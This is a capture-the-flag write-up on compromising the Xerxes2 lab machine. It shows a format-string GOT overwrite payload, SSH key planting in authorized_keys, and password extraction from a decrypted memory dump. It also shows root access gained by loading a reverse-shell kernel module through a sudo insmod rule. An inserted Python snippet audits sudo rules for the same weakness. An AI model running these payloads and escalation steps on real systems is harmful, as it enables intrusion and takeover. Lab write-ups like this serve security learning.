(gdb) r ",>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>#" < write
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/bf
Program received signal SIGSEGV, Segmentation fault.
0xb7ea29d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
(gdb) p/x $edx
$11 = 0x15

If I manage to change an address in the GOT table, then when the program calls that function, it will point to my code.

We will try to overwrite the printf function address and redirect it to the libc system function.

We want to run system(buf) instead of printf(buf).

I write the payload to the file: printf '\x54\x9a\x04\x08_%%16$n' > /tmp/write

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/bf ",>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>#" < /tmp/write
Program received signal SIGSEGV, Segmentation fault.
0x00000005 in ?? ()

I connected and uploaded my id_rsa.pub to the /home/polito/.ssh/authorized_keys file in order to connect normally as polito via ssh.

Forensics part

Under the home directory of polito I found an interesting PDF.

I scanned the QR code with my phone and got the message "Xerxes is watching you...". Just another troll...

I checked with the file command how the system recognizes it, and it reports that it is a boot sector.

$file polito.pdf
polito.pdf: x86 boot sector, code offset 0xe0

Let's try to boot it:

$qemu polito.pdf

Let's decrypt the dump and see what it is: gpg -o decrypt --decrypt dump.gpg

It seems to be a memory dump, so it must include juicy stuff. Let's try to find the string "pass" inside it: strings decrypt | grep "pass"

Yay, I found the exact command that decrypts the file located in /opt/backup/korenchkin: openssl enc -d -salt -aes-256-cbc -pass pass:c2hvZGFu -in /opt/backup/korenchkin.tar.enc -out /home/polito/koren.tar

Then I extract it: tar xvf /home/polito/koren.tar

It contains the ssh keys of the korenchkin user. Let's try to log in as this user: ssh [email protected] -i id_rsa

The home directory is empty. I tried to find anything interesting under /var/mail/korenchkin, but no luck. Then I checked whether I can run any command as root.

$sudo -l
Matching Defaults entries for korenchkin on this host:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User korenchkin may run the following commands on this host:
(root) NOPASSWD: /sbin/insmod, (root) /sbin/rmmod

So I have to find a way to load a kernel module and gain root access.
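That sudo rule is the whole privilege boundary: whoever can insmod as root is root. As an added example (not part of the original writeup), the Python below parses sudo -l output in the format shown above and flags rules that grant kernel-module loading, the check an administrator auditing the host would run; the sample output is constructed from the lines above.

```python
import re

# Constructed sample: the `sudo -l` output shown above, embedded as a string so
# the audit runs offline (in practice feed it the captured output of `sudo -l`).
SAMPLE_SUDO_L = r"""
Matching Defaults entries for korenchkin on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User korenchkin may run the following commands on this host:
    (root) NOPASSWD: /sbin/insmod, (root) /sbin/rmmod
"""

# Binaries that load code into the kernel. Running any of them as root is
# equivalent to being root, with or without NOPASSWD.
KERNEL_LOADERS = {"insmod", "rmmod", "modprobe"}

# One sudo rule: "(runas) [TAG: ...] /path/to/command"; several rules may share
# a line, separated by ", ", exactly as in the sample.
ENTRY_RE = re.compile(
    r"\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>[^\s,]+)"
)


def parse_sudo_l(text):
    """Return (runas_user, tags, command) for each rule under 'may run ...'."""
    entries = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        for m in ENTRY_RE.finditer(line):
            runas_user = m.group("runas").split(":")[0].strip()  # "(root : root)" -> root
            tags = re.findall(r"[A-Z_]+", m.group("tags"))
            entries.append((runas_user, tags, m.group("cmd")))
    return entries


def kernel_module_grants(entries):
    """Flag rules that let the user load or unload kernel modules as root.

    Returns (command, passwordless) pairs; each one is a full root equivalent.
    """
    findings = []
    for runas_user, tags, cmd in entries:
        if runas_user in ("root", "ALL") and cmd.rsplit("/", 1)[-1] in KERNEL_LOADERS:
            findings.append((cmd, "NOPASSWD" in tags))
    return findings


if __name__ == "__main__":
    for cmd, passwordless in kernel_module_grants(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{cmd} runnable as root{' without a password' if passwordless else ''}: root-equivalent")
```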

I found https://github.com/maK-/reverse-shell-access-kernel-module.

I downloaded the source to the xerxes machine and ran make to compile the kernel module.

Then I ran on xerxes2:

$sudo /sbin/insmod maK_it.ko
The kernel module is loaded and is waiting for our interaction.